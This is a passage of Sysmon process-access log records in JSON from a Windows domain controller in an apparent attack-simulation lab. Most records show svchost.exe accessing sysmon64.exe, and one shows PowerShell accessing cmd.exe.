indows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5386,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5387,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5388,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5389,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5390,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5391,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5392,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5393,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nSourceProcessId: 2992\r\nSourceThreadId: 5056\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-0010A5BA0800}\r\nTargetProcessId: 4572\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15631623)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","SourceProcessId":"2992","SourceThreadId":"5056","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-0010A5BA0800}","TargetProcessId":"4572","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15631623)","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
